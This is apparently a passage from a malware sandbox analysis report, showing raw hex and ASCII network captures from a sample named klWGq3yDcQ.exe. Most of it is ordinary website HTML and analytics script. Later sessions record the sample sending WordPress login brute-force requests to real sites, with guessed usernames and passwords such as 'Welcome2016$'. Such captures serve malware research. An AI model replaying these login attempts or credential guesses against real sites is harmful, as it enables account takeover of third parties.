                                                                                                                                                                                                    2023-11-26 05:59:59 UTC16384INData Raw: 2f 70 65 72 73 6f 6e 61 6c 69 7a 61 72 2d 66 61 63 74 75 72 61 2e 6a 73 6f 6e 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 6c 6f 6f 70 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 64 69 72 65 63 74 69 6f 6e 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 61 75 74 6f 70 6c 61 79 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 69 73 2d 69 78 32 2d 74 61 72 67 65 74 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 72 65 6e 64 65 72 65 72 3d 22 73 76 67 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 64 75 72 61 74 69 6f 6e
                                                                                                                                                                                                    Data Ascii: /personalizar-factura.json" data-loop="1" data-direction="1" data-autoplay="1" data-is-ix2-target="0" data-renderer="svg" data-duration
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 74 3d 22 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 69 6d 61 67 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 77 2d 6e 6f 64 65 2d 5f 35 66 38 65 31 64 33 31 2d 38 66 61 38 2d 64 35 63 31 2d 36 30 34 36 2d 30 37 62 34 31 32 34 39 33 63 37 36 2d 31 32 34 39 33 63 37 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6c 61 73 73 3d 22 64 69 76 20 62 67 5f 5f 67 72 65 65 6e 5f 69 6d 61 67 65 20 66 75 6c 6c 2d 63 65 6e 74 65 72 20 72 6f 75 6e 64 65 64 5f 5f 32 30 70 78 22 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: " alt="" class="image" /> </div> <div id="w-node-_5f8e1d31-8fa8-d5c1-6046-07b412493c76-12493c71" class="div bg__green_image full-center rounded__20px"
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC16384INData Raw: 74 65 72 2d 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 49 6e 67 72 65 73 6f 73 20 79 20 67 61 73 74 6f 73 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 65 73 2f 67 65 73 74 69 6f 6e 2d 63 6f 62 72 6f 73 2d 79 2d 70 61 67 6f 73 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 20 66 6f 6f 74 65 72 2d 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 43 6f 62 72 6f 73 20 79 20 70 61 67 6f 73 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 65 73 2f 67 65 73 74 69 6f 6e 2d 63 6c 69 65 6e 74 65 73 2d 70 72 6f 76 65 65 64 6f 72 65 73 22 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 20 66 6f 6f 74 65 72 2d 6c 69
                                                                                                                                                                                                    Data Ascii: ter-link" >Ingresos y gastos</a > <a href="es/gestion-cobros-y-pagos" class="link footer-link" >Cobros y pagos</a > <a href="es/gestion-clientes-proveedores" class="link footer-li
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC13079INData Raw: 20 34 30 2e 38 37 34 39 20 33 33 2e 30 35 31 39 20 34 31 2e 30 37 30 35 20 33 33 2e 34 35 33 39 4c 34 31 2e 39 33 39 37 20 33 35 2e 31 39 32 34 43 34 32 2e 30 39 31 38 20 33 35 2e 34 38 35 37 20 34 32 2e 33 37 34 33 20 33 35 2e 36 34 38 37 20 34 32 2e 36 37 38 35 20 33 35 2e 36 34 38 37 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 33 33 2e 30 39 35 34 20 33 30 2e 34 32 32 35 43 33 33 2e 32 31 34 39 20 33 30 2e 34 32 32 35 20 33 33 2e 33 34 35 33 20 33 30 2e 33 39 20 33 33 2e 34 35 33 39 20 33 30
                                                                                                                                                                                                    Data Ascii: 40.8749 33.0519 41.0705 33.4539L41.9397 35.1924C42.0918 35.4857 42.3743 35.6487 42.6785 35.6487Z" fill="white" ></path> <path d="M33.0954 30.4225C33.2149 30.4225 33.3453 30.39 33.4539 30


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    548192.168.2.45630023.185.0.14436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC170OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.avient.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC929INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 38 36 34 30 30 2c 20 70 75 62 6c 69 63 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 3a 20 65 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 45 74 61 67 3a 20 57 2f 22 31 37 30 30 39 37 38 33 39 39 22 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 31 39 20 4e 6f 76 20 31 39 37 38 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 39 20 47 4d 54 0d 0a 53 65 72 76
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 403 ForbiddenConnection: closeCache-Control: max-age=86400, publicContent-Language: enContent-Type: text/html; charset=UTF-8Etag: W/"1700978399"Expires: Sun, 19 Nov 1978 05:00:00 GMTLast-Modified: Sun, 26 Nov 2023 05:59:59 GMTServ
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC6INData Raw: 34 38 31 66 0d 0a
                                                                                                                                                                                                    Data Ascii: 481f
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC1378INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 20 73 63 68 65 6d 61 3a 20 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" dir="ltr" prefix="content: http://purl.org/rss/1.0/modules/content/ dc: http://purl.org/dc/terms/ foaf: http://xmlns.com/foaf/0.1/ og: http://ogp.me/ns# rdfs: http://www.w3.org/2000/01/rdf-schema# schema: http://schema
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC1378INData Raw: 20 30 2c 73 61 3a 76 6f 69 64 20 30 2c 71 75 65 75 65 54 69 6d 65 3a 76 6f 69 64 20 30 2c 61 70 70 6c 69 63 61 74 69 6f 6e 54 69 6d 65 3a 76 6f 69 64 20 30 2c 74 74 47 75 69 64 3a 76 6f 69 64 20 30 2c 75 73 65 72 3a 76 6f 69 64 20 30 2c 61 63 63 6f 75 6e 74 3a 76 6f 69 64 20 30 2c 70 72 6f 64 75 63 74 3a 76 6f 69 64 20 30 2c 65 78 74 72 61 3a 76 6f 69 64 20 30 2c 6a 73 41 74 74 72 69 62 75 74 65 73 3a 7b 7d 2c 75 73 65 72 41 74 74 72 69 62 75 74 65 73 3a 76 6f 69 64 20 30 2c 61 74 74 73 3a 76 6f 69 64 20 30 2c 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 3a 76 6f 69 64 20 30 2c 74 4e 61 6d 65 50 6c 61 69 6e 3a 76 6f 69 64 20 30 7d 2c 6f 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28
                                                                                                                                                                                                    Data Ascii: 0,sa:void 0,queueTime:void 0,applicationTime:void 0,ttGuid:void 0,user:void 0,account:void 0,product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},o={};function s(e){if(!e)throw new Error(
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC1378INData Raw: 6f 6e 64 73 3a 31 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 6d 65 74 72 69 63 73 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 61 63 74 69 6f 6e 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 65 76 65 6e 74 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 74 69 6d 69 6e 67 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 6c 6f 6e 67 5f 74 61 73 6b 3a 21 31 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 73 65 73 73 69 6f 6e 5f 74 72 61 63 65 3a 7b 65 6e 61 62
                                                                                                                                                                                                    Data Ascii: onds:10,autoStart:!0},metrics:{enabled:!0,autoStart:!0},page_action:{enabled:!0,harvestTimeSeconds:30,autoStart:!0},page_view_event:{enabled:!0,autoStart:!0},page_view_timing:{enabled:!0,harvestTimeSeconds:30,long_task:!1,autoStart:!0},session_trace:{enab
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC1378INData Raw: 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 3b 66 75 6e 63 74 69 6f 6e 20 68 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 69 66 28 21 67 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 67 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 67 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 66 28 29 29 3b 63 6f 6e 73 74 20 6e 3d 28 30 2c 72 2e 65 6b 29 28 65 29 3b 6e 26 26 28 6e 2e 69 6e 69 74 3d 67 5b 65 5d 29 7d 66 75 6e
                                                                                                                                                                                                    Data Ascii: equire an agent identifier!";function h(e){if(!e)throw new Error(p);if(!g[e])throw new Error("Configuration for ".concat(e," was never set"));return g[e]}function v(e,t){if(!e)throw new Error(p);g[e]=(0,i.D)(t,f());const n=(0,r.ek)(e);n&&(n.init=g[e])}fun
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC1378INData Raw: 72 28 22 41 6c 6c 20 72 75 6e 74 69 6d 65 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 69 66 28 21 45 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 52 75 6e 74 69 6d 65 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 45 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 72 75 6e 74 69 6d 65 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 45 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 6b 29 3b 63 6f 6e 73 74 20 6e 3d 28 30 2c 72 2e
                                                                                                                                                                                                    Data Ascii: r("All runtime objects require an agent identifier!");if(!E[e])throw new Error("Runtime for ".concat(e," was never set"));return E[e]}function T(e,t){if(!e)throw new Error("All runtime objects require an agent identifier!");E[e]=(0,i.D)(t,k);const n=(0,r.
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC1378INData Raw: 31 3a 28 29 3d 3e 75 7d 29 3b 63 6f 6e 73 74 20 72 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 21 21 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2c 69 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 2e 6e 61 76 69 67 61 74 6f 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 4e 61 76 69 67 61 74 6f 72 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 20 69 6e
                                                                                                                                                                                                    Data Ascii: 1:()=>u});const r="undefined"!=typeof window&&!!window.document,i="undefined"!=typeof WorkerGlobalScope&&("undefined"!=typeof self&&self instanceof WorkerGlobalScope&&self.navigator instanceof WorkerNavigator||"undefined"!=typeof globalThis&&globalThis in
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC1378INData Raw: 6f 72 20 6f 63 63 75 72 65 64 20 77 68 69 6c 65 20 73 65 74 74 69 6e 67 20 53 68 61 72 65 64 43 6f 6e 74 65 78 74 22 2c 65 29 7d 7d 7d 7d 2c 38 65 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 4c 3a 28 29 3d 3e 64 2c 52 3a 28 29 3d 3e 63 7d 29 3b 76 61 72 20 72 3d 6e 28 38 33 32 35 29 2c 69 3d 6e 28 31 32 38 34 29 2c 61 3d 6e 28 34 33 32 32 29 2c 6f 3d 6e 28 33 33 32 35 29 3b 63 6f 6e 73 74 20 73 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6e 3d 7b 73 74 61 67 65 64 3a 21 31 2c 70 72 69 6f 72 69 74 79 3a 6f 2e 70 5b 74 5d 7c 7c 30 7d 3b 75 28 65 29 2c 73 5b 65 5d 2e 67 65 74 28 74 29 7c 7c 73 5b 65 5d 2e 73 65 74 28 74 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b
                                                                                                                                                                                                    Data Ascii: or occured while setting SharedContext",e)}}}},8e3:(e,t,n)=>{"use strict";n.d(t,{L:()=>d,R:()=>c});var r=n(8325),i=n(1284),a=n(4322),o=n(3325);const s={};function c(e,t){const n={staged:!1,priority:o.p[t]||0};u(e),s[e].get(t)||s[e].set(t,n)}function u(e){
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC1378INData Raw: 20 6e 3d 72 5b 65 5d 3b 69 66 28 21 6e 29 72 65 74 75 72 6e 3b 66 6f 72 28 76 61 72 20 69 3d 30 3b 69 3c 6e 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 6e 5b 69 5d 3d 3d 3d 74 26 26 6e 2e 73 70 6c 69 63 65 28 69 2c 31 29 7d 2c 65 6d 69 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 2c 69 2c 61 29 7b 21 31 21 3d 3d 61 26 26 28 61 3d 21 30 29 3b 69 66 28 75 2e 61 62 6f 72 74 65 64 26 26 21 69 29 72 65 74 75 72 6e 3b 74 26 26 61 26 26 74 2e 65 6d 69 74 28 65 2c 6e 2c 72 29 3b 66 6f 72 28 76 61 72 20 6f 3d 70 28 72 29 2c 63 3d 76 28 65 29 2c 64 3d 63 2e 6c 65 6e 67 74 68 2c 6c 3d 30 3b 6c 3c 64 3b 6c 2b 2b 29 63 5b 6c 5d 2e 61 70 70 6c 79 28 6f 2c 6e 29 3b 76 61 72 20 66 3d 62 28 29 5b 73 5b 65 5d 5d 3b 66 26 26 66 2e 70 75 73 68 28 5b 67 2c 65 2c 6e 2c 6f 5d 29 3b
                                                                                                                                                                                                    Data Ascii: n=r[e];if(!n)return;for(var i=0;i<n.length;i++)n[i]===t&&n.splice(i,1)},emit:function(e,n,r,i,a){!1!==a&&(a=!0);if(u.aborted&&!i)return;t&&a&&t.emit(e,n,r);for(var o=p(r),c=v(e),d=c.length,l=0;l<d;l++)c[l].apply(o,n);var f=b()[s[e]];f&&f.push([g,e,n,o]);


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    549192.168.2.456309162.210.96.1174436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC398OUTPOST /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: coralparkchristian.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=7ap2f73mtil66jvq3afeerovr8
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://coralparkchristian.org/wp-login.php
                                                                                                                                                                                                    Content-Length: 148
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC148OUTData Raw: 6c 6f 67 3d 63 6f 72 61 6c 70 61 72 6b 63 68 72 69 73 74 69 61 6e 26 70 77 64 3d 54 30 4a 52 58 34 57 54 53 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 63 6f 72 61 6c 70 61 72 6b 63 68 72 69 73 74 69 61 6e 2e 6f 72 67 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=coralparkchristian&pwd=T0JRX4WTS&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Fcoralparkchristian.org%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC522INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 72 2d 63 66 2d 6c 69 73 74 5f 65 6d 61 69 6c 5f 73 65 6e 64 5f 74 6f 3d 64 65 6c 65 74 65 64 3b
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:59 GMTServer: ApachePragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: wr-cf-list_email_send_to=deleted;
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC4226INData Raw: 31 30 37 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 69 65 38 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 38 29 20 5d 3e 3c 21 2d 2d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e
                                                                                                                                                                                                    Data Ascii: 107a<!DOCTYPE html>...[if IE 8]><html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US"><![endif]-->...[if !(IE 8) ]>...><html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">...<![endif]--><head><meta http-equiv="Con
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    550192.168.2.45628945.40.150.544436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC382OUTPOST /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: engel-firm.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=u6d52i2h1kmcrvjimqouu9cdon
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: https://engel-firm.com/wp-login.php
                                                                                                                                                                                                    Content-Length: 159
                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC159OUTData Raw: 6c 6f 67 3d 65 6e 67 65 6c 2d 66 69 72 6d 26 70 77 64 3d 57 65 6c 63 6f 6d 65 32 30 31 36 25 32 34 26 77 70 73 65 63 5f 63 61 70 74 63 68 61 5f 61 6e 73 77 65 72 3d 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 65 6e 67 65 6c 2d 66 69 72 6d 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31
                                                                                                                                                                                                    Data Ascii: log=engel-firm&pwd=Welcome2016%24&wpsec_captcha_answer=&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Fengel-firm.com%2Fwp-admin%2F&testcookie=1
                                                                                                                                                                                                    2023-11-26 06:00:00 UTC773INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 61 67 65 3a 20 30 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 75 70 67 72 61 64 65 2d 69 6e
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Sun, 26 Nov 2023 06:00:01 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeage: 0cache-control: no-store, no-cache, must-revalidatecontent-security-policy: upgrade-in
